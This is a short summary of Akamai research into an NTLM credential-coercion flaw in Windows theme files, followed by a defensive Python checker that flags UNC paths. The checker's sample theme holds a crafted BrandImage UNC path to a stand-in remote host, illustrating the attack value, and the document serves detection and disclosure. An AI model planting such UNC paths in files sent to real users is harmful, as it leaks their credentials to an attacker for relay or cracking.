- 💡 Akamai security researcher Tomer Peled discovered a spoofing vulnerability in Microsoft Themes, allowing an attacker to coerce NTLM credentials.
- 💻 The vulnerability affects all Windows versions and was fixed in the January 2024 Patch Tuesday release.
- 🔒 Exploiting the vulnerability requires the victim to download a theme file, triggering an automatic authentication coercion attack.
- 🔄 The attack works by changing values in the theme file to UNC paths that point to an attacker-controlled server, so the victim's machine sends its NTLM credentials to that server when the theme is applied.
- ⚠️ With NTLM credentials, an attacker can perform an NTLM relay attack or crack the victim’s password.
- 🛠️ Microsoft patched the vulnerability by adding checks for UNC paths in theme files.
- 🛡️ Mitigation involves blocking NTLM authentication over SMB, using group policies, and implementing microsegmentation.
- 📅 The vulnerability was disclosed to Microsoft in September 2023 and patched in January 2024.
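As an added defensive example (not from the Akamai post or Microsoft), the check below parses an INI-style `.theme` file and flags any value that is a UNC path, which is the kind of content Microsoft's patch now rejects. The sample theme is constructed, and the key names in it are illustrative; the post itself does not list which theme properties were abused.

```python
import re
from typing import List, Tuple

# Matches \\host\share\... and the long-form \\?\UNC\host\share\... prefixes.
UNC_RE = re.compile(r"^(\\\\\?\\UNC\\|\\\\)[^\\\s]+\\", re.IGNORECASE)

Entry = Tuple[str, str, str]  # (section, key, value)


def parse_theme(text: str) -> List[Entry]:
    """Parse INI-style .theme content into (section, key, value) triples.

    A small hand-rolled parser is used instead of configparser because theme
    files may repeat keys and section names contain backslashes."""
    entries: List[Entry] = []
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            entries.append((section, key.strip(), value.strip()))
    return entries


def find_unc_references(text: str) -> List[Entry]:
    """Return every entry whose value is a UNC path to a remote host."""
    return [e for e in parse_theme(text) if UNC_RE.match(e[2])]


# Constructed sample: a normal local wallpaper plus one value rewritten to
# point at a remote share (192.0.2.10 is a documentation-only address).
SAMPLE_THEME = """\
; constructed example theme file
[Theme]
DisplayName=Example Theme
BrandImage=\\\\192.0.2.10\\share\\brand.png

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
Pattern=
"""

if __name__ == "__main__":
    for section, key, value in find_unc_references(SAMPLE_THEME):
        print(f"remote reference in [{section}] {key} = {value}")
```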
Full post: https://www.akamai.com/blog/security-research/leaking-ntlm-credentials-through-windows-themes